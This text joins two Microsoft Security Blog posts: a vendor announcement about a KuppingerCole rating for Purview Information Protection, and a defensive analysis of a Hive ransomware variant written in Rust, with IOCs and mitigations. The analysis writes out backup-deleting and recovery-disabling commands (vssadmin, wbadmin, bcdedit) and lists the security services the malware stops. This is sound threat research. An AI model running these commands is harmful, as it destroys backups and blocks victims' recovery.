The Secure Collaboration Market Compass report covers solutions that protect sensitive data, which includes intellectual property or information restricted to certain audiences (such as trade secrets, some legal contracts, agreements, and financial statements), along with personally identifiable information (PII) and health information for regulatory standards such as General Data Protection Regulation (GDPR), California Consumer Privacy Act (CCPA), and Health Insurance Portability and Accountability Act (HIPAA). As companies shift towards remote hybrid work, protecting sensitive data that is continuously created and shared among employees, contractors, partners, and suppliers—while not impeding worker productivity—is becoming increasingly important. Enterprises today face the challenge of classifying large volumes of data, especially personal data, which is required by privacy regulations and laws worldwide.

At Microsoft, our goal is to provide a built-in, intelligent, unified, and extensible solution to protect sensitive data across your digital estate—in Microsoft 365 cloud services, on-premises, third-party software as a service (SaaS) applications, and more. With Microsoft Purview Information Protection, we are building a unified set of capabilities for classification, labeling, and protection, not only in Microsoft Office apps but also in other popular productivity services where the information resides (such as SharePoint Online, Exchange Online, and Microsoft Teams), as well as endpoint devices.

“Microsoft Purview Information Protection provides a sophisticated classification system that can apply labeling to a document based on the creator, the context in which it was created, and/or the content within the document. The functionality is natively embedded into Office services and apps, and third-party applications via the information protection SDK. Sensitive information is discovered and labeled with out-of-the-box, custom, and machine learning (trainable) functionality,” Annie Bailey, KuppingerCole analyst, writes in the report. “Information such as credit card, social security number (SSN), person names, licenses, and business categories like healthcare or financial can be classified out-of-the-box. Custom fields include RegEx, Dictionary, Fingerprint, Named entities detection (e.g., person name, address, medical terms), Exact Data Match, and credentials.”

We are also pleased that KuppingerCole recognizes the breadth and depth of our Microsoft Purview Information Protection platform and called out these strengths:

•  Double Key Encryption provides additional security and governance control.
•  Built into frequently used enterprise applications.
•  Simulations to test policy effectiveness.
•  Interoperates with Microsoft and third-party event logs.
•  Automated and manual classification options.
•  Coverage of structured and unstructured data in the Microsoft environment.
•  Data loss prevention functionality in Teams chat.
•  Option for no configuration, default classification.

We have made significant investments in our Microsoft Purview solutions (such as Data Loss Prevention, Compliance Manager, Data Lifecycle Management, Insider Risk Management, and eDiscovery) and Microsoft Priva privacy solution that leverage our advanced classifiers, unified labeling and protection, sensitive information types, and policy authoring templates provided by our Microsoft Purview Information Protection platform.

More than 200 partners are part of our Microsoft Intelligent Security Association (MISA). Partners can leverage our labeling features through our Information Protection SDK, data connectors, and Graph APIs to provide integrations with Microsoft applications and services, security and compliance solutions, and their own products.

We are honored to have been designated as “Outstanding in Functionality” by KuppingerCole and rated the highest possible score of “Strong Positive” in five different categories.

Learn more

We invite you to read the full KuppingerCole Secure Collaboration report. For more information on our Microsoft Purview solutions, please visit our website. Visit the Microsoft Purview Information Protection platform page to learn more about how to protect your data wherever it lives.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post KuppingerCole rates Microsoft as outstanding in functionality for secure collaboration appeared first on Microsoft Security Blog.

Hive ransomware gets upgrades in Rust

Hive ransomware is only about one year old, having been first observed in June 2021, but it has grown into one of the most prevalent ransomware payloads in the ransomware-as-a-service (RaaS) ecosystem. With its latest variant carrying several major upgrades, Hive also proves it’s one of the fastest evolving ransomware families, exemplifying the continuously changing ransomware ecosystem.

The upgrades in the latest variant are effectively an overhaul: the most notable changes include a full code migration to another programming language and the use of a more complex encryption method. The impact of these updates is far-reaching, considering that Hive is a RaaS payload that Microsoft has observed in attacks against organizations in the healthcare and software industries by large ransomware affiliates like DEV-0237.

Microsoft Threat Intelligence Center (MSTIC) discovered the new variant while analyzing detected Hive ransomware techniques for dropping .key files. We know that Hive drops its encryption keys file, which contains encrypted keys used to decrypt encrypted files, and uses a consistent naming pattern:

(e.g., BiKtPupMjgyESaene0Ge5d0231uiKq1PFMFUEBNhAYv_.key.ab123)

The said .key files were missing the [VICTIM_IDENTIFIER] part of the file name, prompting deeper analysis of the Hive ransomware that dropped them. This analysis led to the discovery of the new Hive variant and its multiple versions, which exhibit slightly different available parameters in the command line and the executed processes.

Analyzing these patterns in samples of the new variants, we discovered even more samples, all with a low detection rate and none being correctly identified as Hive. In this blog we will share our in-depth analysis of the new Hive variant, including its main features and upgrades, with the aim of equipping analysts and defenders with information to better identify and protect organizations against malware attacks relying on Hive.

Analysis and key findings

The switch from GoLang to Rust

The main difference between the new Hive variant and old ones is the programming language used. The old variants were written in Go (also referred to as GoLang), while the new Hive variant is written in Rust.

Hive isn’t the first ransomware written in Rust—BlackCat, another prevalent ransomware, was the first. By switching the underlying code to Rust, Hive benefits from the following advantages that Rust has over other programming languages:

  • It offers memory, data type, and thread safety
  • It has deep control over low-level resources
  • It has a user-friendly syntax
  • It has several mechanisms for concurrency and parallelism, thus enabling fast and safe file encryption
  • It has a good variety of cryptographic libraries
  • It’s relatively more difficult to reverse-engineer

String encryption

The new Hive variant uses string encryption that can make it more evasive. Strings reside in the .rdata section and are decrypted during runtime by XORing with constants. The constants that are used to decrypt the same string sometimes differ across samples, making them an unreliable basis for detection.

For example, let’s look at the section where part of the string “!error no flag -u <login>:<password> provided” is decrypted. In one sample (SHA-256: f4a39820dbff47fa1b68f83f575bc98ed33858b02341c5c0464a49be4e6c76d3), the constants are 0x9F2E3F1F and 0x95C9:

Partial screenshot of a code-level analysis of a Hive sample.
Figure 1 – String decryption using constants 0x9F2E3F1F and 0x95C9

In another sample (SHA-256: 6e5d49f604730ef4c05cfe3f64a7790242e71b4ecf1dc5109d32e811acf0b053), the constants are 0x3ECF7CC4 and 0x198F:        

Partial screenshot of a code-level analysis of a Hive sample.
Figure 2 – String decryption using constants 0x3ECF7CC4 and 0x198F

Some samples do share constants when decrypting the same string. For example, let’s look where the parameter string “-da” is decrypted. In one sample (SHA-256: 88b1d8a85bf9101bc336b01b9af4345ed91d3ec761554d167fe59f73af73f037), the constants are 0x71B4 and 2:

Partial screenshot of a code-level analysis of a Hive sample.
Figure 3 – String decryption using constants 0x71B4 and 2

In another sample (SHA-256: 33744c420884adf582c46a4b74cbd9c145f2e15a036bb1e557e89d6fd428e724), the constants are the same:

Partial screenshot of a code-level analysis of a Hive sample.
Figure 4 – String decryption in a different sample also using constants 0x71B4 and 2

Command-line parameters

In old Hive variants, the username and the password used to access the Hive ransom payment website are embedded in the samples. In the new variant, these credentials must be supplied in the command line under the “-u” parameter, which means that they can’t be obtained by analysts from the sample itself.

Partial screenshot of a command prompt showing an error message.
Figure 5 – Without a username and a password, the sample won’t continue its execution

Like most modern ransomware, Hive introduces command-line parameters, which allow attackers flexibility when running the payload by adding or removing functionality. For example, an attacker can choose to encrypt files on remote shares or local files only or select the minimum file size for encryption. In the new Hive variant, we found the following parameters across different samples:

Parameter Functionality
-no-local Don’t encrypt local files
-no-mounted Don’t encrypt files on mounted network shares
-no-discovery Don’t discover network shares
-local-only Encrypt only local files
-network-only Encrypt only files on network shares
-explicit-only Encrypt specific folder(s). For example, ‘-explicit-only c:\mydocs c:\myphotos’
-min-size Minimum file size, in bytes, to encrypt. For example, ‘-min-size 102400’ will encrypt files with size equal or greater than 100kb
-da [Usage is being analyzed.]
-f [Usage is being analyzed.]
-force [Usage is being analyzed.]
-wmi [Usage is being analyzed.]

Overall, it appears different versions have different parameters that are constantly updated. Unlike in previous variants where there was a ‘help’ menu, in the new variant, the attacker must know the parameters beforehand. Since all strings are encrypted, it makes finding the parameters challenging for security researchers.

Stopped services and processes

Like most sophisticated malware, Hive stops services and processes associated with security solutions and other tools that might get in the way of its attack chain. Hive tries to impersonate the process tokens of trustedinstaller.exe and winlogon.exe so it can stop Microsoft Defender Antivirus, among other services.

Hive stops the following services:

windefend, msmpsvc, kavsvc, antivirservice, zhudongfungyu, vmm, vmwp, sql, sap, oracle, mepocs, veeam, backup, vss, msexchange, mysql, sophos, pdfservice, backupexec, gxblr, gxvss, gxclmgrs, gxvcd, gxcimgr, gxmmm, gxvsshwprov, gxfwd, sap, qbcfmonitorservice, qbidpservice, acronisagent, veeam, mvarmor, acrsch2svc

It also stops the following processes:

dbsnmp, dbeng50, bedbh, excel, encsvc, visios, firefox, isqlplussvc, mspub, mydesktopqos, notepad, ocautoupds, ocomm, ocssd, onenote, outlook, sqbcoreservice, sql, steam, tbirdconfig, thunderbird, winword, wordpad, xfssvccon, vxmon, benetns, bengien, pvlsvr, raw_agent_svc, cagservice, sap, qbidpservice, qbcfmonitorservice, teamviewer_service, teamviewer, tv_w32, tv_x64, cvd, saphostexec, sapstartsrv, avscc, dellsystemdetect, enterpriseclient, veeam, thebat, cvfwd, cvods, vsnapvss, msaccess, vaultsvc, beserver, appinfo, qbdmgrn, avagent, spooler, powerpnt, cvmountd, synctime, oracle, wscsvc, winmgmt, *sql*

Launched processes

As part of its ransomware activity, Hive typically runs processes that delete backups and prevent recovery. There are differences between versions, and some samples may not execute all these processes, but one sample that starts the most processes is SHA-256: 481dc99903aa270d286f559b17194b1a25deca8a64a5ec4f13a066637900221e:

  • “vssadmin.exe delete shadows /all /quiet”
  • “wmic.exe shadowcopy delete”
  • “wbadmin.exe delete systemstatebackup”
  • “wbadmin.exe delete catalog -quiet”
  • “bcdedit.exe /set {default} recoveryenabled No”
  • “bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures”
  • “wbadmin.exe delete systemstatebackup -keepVersions:3”

Ransom note

Hive’s ransom note has also changed, with the new version referencing the .key files with their new file name convention and adding a sentence about virtual machines (VMs).

The older variants had an embedded username and password (marked as hidden). In the new variant, the username and password are taken from the command line parameter -u and are labeled test_hive_username and test_hive_password.

Old ransom note text:

 Your network has been breached and all data were encrypted.
Personal data, financial reports and important documents are ready to disclose.
To decrypt all the data and to prevent exfiltrated files to be disclosed at 
you will need to purchase our decryption software.
Please contact our sales department at:
      Login:    [REDACTED]
      Password: [REDACTED]
To get an access to .onion websites download and install Tor Browser at: (Tor Browser is not related to us)
Follow the guidelines below to avoid losing your data:
- Do not modify, rename or delete *.key.abc12 files. Your data will be 
- Do not modify or rename encrypted files. You will lose them.
- Do not report to the Police, FBI, etc. They don't care about your business.
   They simply won't allow you to pay. As a result you will lose everything.
- Do not hire a recovery company. They can't decrypt without the key. 
   They also don't care about your business. They believe that they are 
   good negotiators, but it is not. They usually fail. So speak for yourself.
- Do not reject to purchase. Exfiltrated files will be publicly disclosed.

New ransom note text:

Your network has been breached and all data were encrypted.
Personal data, financial reports and important documents are ready to disclose.
To decrypt all the data and to prevent exfiltrated files to be disclosed at 
you will need to purchase our decryption software.
Please contact our sales department at:
      Login:    test_hive_username
      Password: test_hive_password
To get an access to .onion websites download and install Tor Browser at: (Tor Browser is not related to us)
Follow the guidelines below to avoid losing your data:
- Do not delete or reinstall VMs. There will be nothing to decrypt.
- Do not modify, rename or delete *.key files. Your data will be 
- Do not modify or rename encrypted files. You will lose them.
- Do not report to the Police, FBI, etc. They don't care about your business.
   They simply won't allow you to pay. As a result you will lose everything.
- Do not hire a recovery company. They can't decrypt without the key. 
   They also don't care about your business. They believe that they are 
   good negotiators, but it is not. They usually fail. So speak for yourself.
- Do not reject to purchase. Exfiltrated files will be publicly disclosed.


The most interesting change in the Hive variant is its cryptography mechanism. The new variant was first uploaded to VirusTotal on February 21, 2022, just a few days after a group of researchers from Kookmin University in South Korea published the paper “A Method for Decrypting Data Infected with Hive Ransomware” on February 17, 2022. After a certain period of development, the new variant first appeared in Microsoft threat data on February 22.

The new variant uses a different set of algorithms: Elliptic Curve Diffie-Hellmann (ECDH) with Curve25519 and XChaCha20-Poly1305 (authenticated encryption with ChaCha20 symmetric cipher).

A unique encryption approach

The new Hive variant uses a unique approach to file encryption. Instead of embedding an encrypted key in each file that it encrypts, it generates two sets of keys in memory, uses them to encrypt files, and then encrypts and writes the sets to the root of the drive it encrypts, both with .key extension.

To indicate which keys set was used to encrypt a file, the name of the .key file containing the corresponding encryption keys is added to the name of the encrypted file on disk, followed by an underscore and then a Base64 string (also adding underscore and hyphen to the character set). Once it’s Base64-decoded, the string contains two offsets, with each offset pointing to a different location in the corresponding .key file. This way, the attacker can decrypt the file using these offsets.

For example, after running Hive, we got the following files dropped to the C:\ drive:

  • C:\3bcVwj6j.key
  • C:\l0Zn68cb.key

In this example, a file named myphoto.jpg would be renamed to C:\myphoto.jpg.l0Zn68cb _ -B82BhIaGhI8. As we discuss in the following sections, the new variant’s keys set generation is entirely different from old variants. However, its actual file encryption is very similar.

Keys set generation

A buffer of size 0xCFFF00 bytes is allocated. Using two custom functions to generate random bytes (labeled “random_num_gen” and “random_num_gen_2” for demonstration purposes) the buffer is filled. The first 0xA00000 bytes of this buffer are filled with random bytes and the remaining 0x2FFF00 bytes are simply copied from the first 0x2FFF00 random bytes that were copied earlier to the buffer.

The content of each buffer is a keys set (a collection of symmetric keys). Since two buffers are allocated, there are two keys sets. In the encryption process, the malware randomly selects different keys (byte sequences) for each file from one of the keys set and uses them to encrypt the file by XORing the byte sequence of the keys with the file’s content.

Partial screenshot of a Hive variant's encryption technique in assembly code.
Figure 6 – Original keys set generation
Partial screenshot of a Hive variant's encryption technique in assembly code.
Figure 7 – Inside get_random_byte

A custom 64-byte hash is prepared for each keys set. This hash will be used later.

Partial screenshot of a Hive variant's encryption technique in assembly code.
Figure 8 – Preparing the custom hash of the keys set

After the hash is computed and several other strings are decrypted, the encryption process takes the following steps:

  1. Generate victim_private_key using the same functions introduced above.
Partial screenshot of a Hive variant's encryption technique in assembly code.
Figure 9 – Generating victim_private_key
  1. Generate victim_public_key using ECDH with Curve25519. The input is victim_private_key and the basepoint is 9 followed by 31 zeros (embedded in the sample).
Partial screenshot of a Hive variant's encryption technique in assembly code.
Figure 10 – Generating victim_public_key
  1. Generate a 24-byte nonce for the XChaCha algorithm, later in Poly1305-XChaCha20.
Partial screenshot of a Hive variant's encryption technique in assembly code.
Figure 11 – Generating a 24-byte nonce
  1. Generate shared_secret using ECDH with Curve25519. The input is victim_private_key and hive_public_key. Then, the  shared_secret (as a key) with hive_public_key (as a nonce) is used to derive the derived_key using ChaCha20.
Partial screenshot of a Hive variant's encryption technique in assembly code.
Figure 12 – Generating shared_secret
  1. Encrypt the keys set using Poly1305-XChaCha20. The values used for the encryption are the keys set, derived_key, nonce, and the embedded associated data (AD). This function encrypts the keys set and adds a 16-byte authentication tag at the end of the buffer of the encrypted keys. It’s unclear if the authentication tag is ever checked.
Partial screenshot of a Hive variant's encryption technique in assembly code.
Figure 13 – Encrypting the keys set

Now that the keys set is finally encrypted, the nonce, victim_public_key, the now-encrypted keys set, and the authentication tag are copied to a new buffer, one after another. This buffer (which we label encrypted_structure_1) is treated as a new keys set, which is again encrypted using the same method described above but with a second hive_public_key. This time, the function outputs new nonce, victim_private_key, and others. Only the associated data is the same.

Finally, the new buffer, which contains the second_nonce, second_victim_public_key, and the encryptedencrypted_structure_1, is written to the root of the drive it’s encrypting (for example, C:\). The create_extension function generates a Base64 string based on the first six bytes of the custom hash that was created earlier. This Base64 string serves as the file name, and the extension of the file is simply “.key”.

Partial screenshot of a Hive variant's encryption technique in assembly code.
Figure 14 – Generating a Base64 string based on the first six bytes of the custom hash
Partial screenshot of a Hive variant's encryption technique in assembly code.
Figure 15 – Using the Base64 string as the file name

The diagram below illustrates the encryption scheme described above:

Diagram containing icons and arrows illustrating the new Hive variant's encryption scheme.
Figure 16 – The keys set encryption scheme of the new Hive variant

As seen in the diagram above, “Keys sets encryption flow” is executed twice. In the first round it is executed with the original keys set as an input. In the second round it is executed with the “encrypted structure 1” as an input. In its second execution, all other input values are different except the AD (associated data) and the Basepoint 9.

Hence, the following values are new in the second execution: victim_private_key, victim_public_key, hive_public_key, nonce, shared_secret and derived_key.

File encryption

After both keys files are written to the disk, the multi-threaded file encryption starts. Before encrypting each file, the malware checks its name and extension against a list of strings. If there is a match, then the file will not be encrypted. For example, a file with .exe extension will not be encrypted if .exe is in the list of strings. It should be noted that this list is encrypted and decrypted during runtime.

The same file encryption method seen in old variants is used in the new one: two random numbers are generated and used as offsets to the keys set. Each offset is four bytes:

Partial screenshot of a Hive variant's encryption technique in assembly code.
Figure 17 – Generating the offsets

For the encryption, the file’s content is XORed with bytes from the keys set, according to the offsets. The file bytes are XORed twice—once according to the first offset and a second time according to the second offset. Files are encrypted in blocks of 0x100000 bytes, with the maximum number of blocks at 100. There is an interval between the encrypted blocks as defined by block_space. After the encryption is finished in memory, the encrypted data is written to the disk, overwriting the original file.

Partial screenshot of a code snippet
Figure 18 – Calculation of number of blocks
Partial screenshot of a code snippet
Figure 19 – Actual encryption of the file bytes
Partial screenshot of a Hive variant's encryption technique in assembly code.
Figure 20 – Reading a file, encrypting it, and writing it back to the disk

Looking at when create_extension is called once file encryption has started, we recognized a similar structure in the previous variant:

Partial screenshot of a Hive variant's structure in assembly code.
Figure 21 – Creating the extension for the file

Let us look at the value (72 D7 A7 A3 F5 5B FF EF 21 6B 11 7C 2A 18 CD 00) in the address of r9 register just before create_extension is called on a file called EDBtmp.log

Partial screenshot of a hexadecimal value

Recall that in the older variants, 0xFF was used as a delimiter to separate the key file name from the offset values. We can also see it here. Converting the first six bytes (72 D7 A7 A3 F5 5B) to Base64 yields the following:


And if we step over create_extension, the result is similar—we get cteno_Vb as the .key file name (note: Since Hive uses a different Base64 character set, “/” was replaced with “_”):

Partial screenshot of hexadecimal values

Microsoft will continue to monitor the Hive operators’ activity and implement protections for our customers. The current detections, advanced detections, and indicators of compromise (IOCs) in place across our security products are detailed below.

Recommended customer actions

The techniques used by the new Hive variant can be mitigated by adopting the security considerations provided below:

  • Use the included IOCs to investigate whether they exist in your environment and assess for potential intrusion.

Our recent blog on the ransomware-as-a-service economy has an exhaustive guide on how to protect yourself from ransomware threats that dive deep into each of the following areas. We encourage readers to refer to that blog for a comprehensive guide on:

For Microsoft 365 Defender customers, the following checklist eliminates security blind spots:

  • Turn on cloud-delivered protection in Microsoft Defender Antivirus to cover rapidly evolving attacker tools and techniques, block new and unknown malware variants, and enhance attack surface reduction rules and tamper protection.
  • Turn on tamper protection features to prevent attackers from stopping security services.
  • Run EDR in block mode so that Microsoft Defender for Endpoint can block malicious artifacts, even when a non-Microsoft antivirus doesn’t detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode also blocks indicators identified proactively by Microsoft Threat Intelligence teams.
  • Enable network protection to prevent applications or users from accessing malicious domains and other malicious content on the internet.
  • Enable investigation and remediation in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches.
  • Use device discovery to increase visibility into the network by finding unmanaged devices and onboarding them to Microsoft Defender for Endpoint.
  • Protect user identities and credentials using Microsoft Defender for Identity, a cloud-based security solution that leverages on-premises Active Directory signals to monitor and analyze user behavior to identify suspicious user activities, configuration issues, and active attacks.

Indicators of compromise (IOCs)

The below list provides a partial list of the IOCs observed during our investigation and included in this blog. We encourage our customers to investigate these indicators in their environments and implement detections and protections to identify past related activity and prevent future attacks against their systems.

Indicator Type Description
f4a39820dbff47fa1b68f83f575bc98ed33858b02341c5c0464a49be4e6c76d3 SHA-256 Hive Rust variant payload
88b1d8a85bf9101bc336b01b9af4345ed91d3ec761554d167fe59f73af73f037 SHA-256 Hive Rust variant payload
065208b037a2691eb75a14f97bdbd9914122655d42f6249d2cca419a1e4ba6f1 SHA-256 Hive Rust variant payload
33744c420884adf582c46a4b74cbd9c145f2e15a036bb1e557e89d6fd428e724 SHA-256 Hive Rust variant payload
afab34235b7f170150f180c7afb9e3b4e504a84559bbd03ab71e64e3b6541149 SHA-256 Hive Rust variant payload
36759cab7043cd7561ac6c3968832b30c9a442eff4d536e901d4ff70aef4d32d SHA-256 Hive Rust variant payload
481dc99903aa270d286f559b17194b1a25deca8a64a5ec4f13a066637900221e SHA-256 Hive Rust variant payload
6e5d49f604730ef4c05cfe3f64a7790242e71b4ecf1dc5109d32e811acf0b053 SHA-256 Hive Rust variant payload
32ff0e5d87ec16544b6ff936d6fd58023925c3bdabaf962c492f6b078cb01914 SHA-256 Hive Rust variant payload

NOTE: These indicators shouldn’t be considered exhaustive for this observed activity.


Microsoft 365 Defender

Microsoft Defender Antivirus

Microsoft Defender Antivirus provides detection for this threat under the following family names with build version 1.367.405.0 or later.

  • Ransom:Win64/Hive
  • Ransom:Win32/Hive

Microsoft Defender for Endpoint detection

Microsoft Defender for Endpoint customers may see any or a combination of the following alerts as an indication of possible attack. These alerts are not necessarily an indication of a Hive compromise, but should be investigated:

  • Ransomware behavior detected in the file system
  • File backups were deleted
  • Possible ransomware infection modifying multiple files
  • Possible ransomware activity
  • Ransomware-linked emerging threat activity group detected

Advanced hunting queries

Microsoft Sentinel

To locate possible Hive ransomware activity mentioned in this blog post, Microsoft Sentinel customers can use the queries detailed below:

Identify Hive ransomware IOCs

This query identifies a match across various data feeds for IOCs related to Hive ransomware.

Identify backup deletion

This hunting query helps detect a ransomware’s attempt to delete backup files.

Identify Microsoft Defender Antivirus detection of Hive ransomware

This query looks for Microsoft Defender Antivirus detections related to the Hive ransomware and joins the alert with other data sources to surface additional information such as device, IP, signed-in users, etc.

The post Hive ransomware gets upgrades in Rust appeared first on Microsoft Security Blog.